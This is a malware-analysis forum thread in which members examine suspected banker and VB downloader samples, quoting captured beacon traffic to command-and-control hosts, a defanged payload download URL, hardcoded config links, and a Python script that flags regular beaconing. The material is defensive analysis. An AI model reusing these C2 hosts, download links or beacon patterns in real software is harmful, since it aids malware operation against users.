A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #6214  by Xylitol
 Thu May 05, 2011 11:07 pm
markusg wrote:Setup.exe
http://www.virustotal.com/file-scan/rep ... 1304615533
could be some sort of banker?
call home every min
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:06:08 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:07:08 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
Host: wart3.jino.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:08:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
Server: Jino.ru/mod_pizza
Content-Length: 0
http://anubis.iseclab.org/?action=resul ... ormat=html
http://www.sunbeltsecurity.com/cwsandbo ... C3D3ECB09A
http://camas.comodo.com/cgi-bin/submit? ... 352eb48e4a
http://www.threatexpert.com/report.aspx ... e6b1e8b9fc

reuploaded, high workload.
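As an added example (not code from the original post), a small Python script that parses a transcript like the one quoted above and flags the pattern markusg describes: the same GET at a fixed interval, always answered with an empty body. The transcript is constructed from the capture shown; the 5-second tolerance and the User-Agent length threshold are assumptions.

```python
import re
from datetime import datetime

# Constructed transcript modelled on the capture quoted above; dashed lines separate exchanges.
TRANSCRIPT = """GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:06:08 GMT
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:07:08 GMT
Content-Length: 0
----------------------------------------------------
GET /gate.php?id=05878112 HTTP/1.1
User-Agent: al
HTTP/1.1 200 OK
Date: Thu, 05 May 2011 23:08:09 GMT
Content-Length: 0
"""

def header(block, name):
    """Return the value of one header inside a captured block, or '' if it is absent."""
    m = re.search(rf"^{name}:[ \t]*(.+)$", block, re.M | re.I)
    return m.group(1).strip() if m else ""

def parse_exchanges(text):
    """Turn each dash-separated request/response pair into the fields a beacon rule needs."""
    exchanges = []
    for block in re.split(r"^-{10,}$", text, flags=re.M):
        req = re.search(r"^GET (\S+) HTTP/1\.[01]", block, re.M)
        if req:
            exchanges.append({"path": req.group(1), "ua": header(block, "User-Agent"),
                              "when": datetime.strptime(header(block, "Date"), "%a, %d %b %Y %H:%M:%S GMT"),
                              "clen": int(header(block, "Content-Length") or 0)})
    return exchanges

def beacon_verdict(exchanges, tolerance_s=5):
    """Flag a beacon: >=3 requests at a near-constant interval and every reply empty (assumed thresholds)."""
    times = sorted(e["when"] for e in exchanges)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    if len(gaps) < 2:
        return {"beacon": False, "reason": "need at least three requests"}
    period = sum(gaps) / len(gaps)
    regular = all(abs(g - period) <= tolerance_s for g in gaps)
    empty = all(e["clen"] == 0 for e in exchanges)
    odd_ua = all(len(e["ua"]) < 10 for e in exchanges)  # "al" is nothing a browser would send
    return {"beacon": regular and empty, "period_s": period, "odd_ua": odd_ua}
```

On the constructed transcript the verdict is a beacon with a period of roughly 60 seconds; on a real proxy log the same rule would be run per client and per host/path pair.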
 #13955  by Buster_BSA
 Thu Jun 14, 2012 12:46 am
Looking at Buster Sandbox Analyzer's report I'd say a crappy VB downloader.
 #13956  by EP_X0FF
 Thu Jun 14, 2012 2:24 am
Downloads and executes arbitrary files from hxxp://abuser.user32.com

hxxp://abuser.user32.com/flash_player.zip

To view fake facebook page add anything to URL e.g. hxxp://abuser.user32.com//1
GET /update.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1 SV1)
Accept-Language: en
Accept: */*
Host: abuser.user32.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Thu, 14 Jun 2012 02:12:17 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
Attachments
pass: infected
 #14268  by EP_X0FF
 Mon Jun 25, 2012 2:21 pm
rkhunter wrote:
markusg wrote:https://www.virustotal.com/file/bb1431a ... /analysis/
Legitimate tool?
No, look deeper :) I doubt Realtek is like this
C:\Users\alekovo\Desktop\[FanProject]\[VB6]FanProject\FanProject.vbp
configs here

http://pastebin.com/PF4F1NNN
http://codepaste.net/zp1q6b

yes, these links are hardcoded inside.
 #14270  by rkhunter
 Mon Jun 25, 2012 2:39 pm
EP_X0FF wrote:No, look deeper :) I doubt Realtek is like this
yep, they need to be more secretive :)